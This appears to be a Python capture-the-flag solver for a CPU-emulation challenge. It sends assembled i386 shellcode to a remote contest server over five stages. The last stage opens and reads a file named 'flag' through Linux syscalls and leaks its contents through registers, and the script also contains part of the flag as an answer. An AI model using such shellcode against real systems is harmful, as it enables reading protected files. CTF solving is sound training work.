from codez import *


def stage1(r):
    r.read('below')
    args = map(lambda x:x.split('='),r.read('input').split("\n")[1:-1])
    p=''
    for k,v in args:
        p += 'mov %s,%s\n' % (k.lower(),v)
    r.write(asm(p,'i386').encode('hex') +"\n" )

def stage2(r):

    r.read('below')
    # eax + ebp - esp + edx * edi * ebx * esi - ecx
    val=r.read('input').split('=')[1].split('\n')[0]
    p=[]
    for x in ['ebp','esp','edx','edi','ebx','esi','ecx']:
        p.append('xor %s,%s'%(x,x))
    p='mov eax,%s\n'%val + '\n'.join(p)
    r.write(asm(p,'i386').encode('hex') +"\n" )


search_tmpl=('''
 mov ebp,%d
l:
 inc ebp
 mov eax,[ebp]
 test eax,eax
 jz l
 mov eax,ebp
''')
    
def stage3(r,addr):
    r.read('input')        
    p = asm(search_tmpl%addr,'i386')
    r.write(p.encode('hex') +"\n")
    
def stage4(r):
    x=r.read("input")
    eip=x.split('EIP:')[1].strip().split("\n")[0].strip()
    print eip
#    eip = 0x1000
    t='mov esp,0x2000\nmov eax,%s\ndec eax\nlea ebx,[eax]\nmov byte [ebx],0xcc\njmp eax\n'
    p= asm(t%eip,'i386')
    r.write(p.encode('hex') +"\n")
open_t = ('''
jmp f
x:
  pop ebp
  mov al,5
  mov ebx,ebp
  int 80h
  mov edi,eax
  mov ebx,edi
  mov ecx,esp
  mov edx,128
  mov al,3
  int 80h
  mov eax,[esp+28]
  mov ebx,[esp+32]
  mov ecx,[esp+36]
  mov edx,[esp+40]
  mov edi,[esp+44]
  mov esi,[esp+48]
  mov ebp,[esp+52]
  int 3
f:
call x
db 'flag',0
''')    
def stage5(r):
    r.read('input')
    p = asm(open_t,'i386')
    r.write(p.encode('hex') +"\n")
        
r =Remote('175.119.158.132', 31337)
stage1(r)
stage2(r)
stage3(r,0x1000+15)
stage4(r)
stage5(r)
r.read('Complete!')

val=dict(map(lambda x:x.split(' = '),r.read('Stage5').split("\n")[1:-1]))
flag = 'CPU_Emulati0n_1s_sO'
for reg in ['eax','ebx','ecx','edx','edi','esi','ebp']:
    flag += pack('I',int(val[reg.upper()],16))
print flag